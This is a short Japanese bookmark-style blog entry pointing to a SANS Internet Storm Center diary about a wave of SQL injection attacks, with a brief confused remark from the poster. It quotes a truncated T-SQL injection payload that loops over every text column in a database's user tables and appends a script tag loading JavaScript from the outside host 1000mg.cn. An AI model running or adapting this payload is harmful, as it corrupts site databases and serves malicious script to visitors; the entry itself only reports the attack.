More SQL Injections - very active right now:SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc(情報元のブックマーク数)
ふむぅ、よくわからんw
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''">1000mg.cn/csrss/w.js">
InfoSec Handlers Diary Blog - More SQL Injections - very active right now
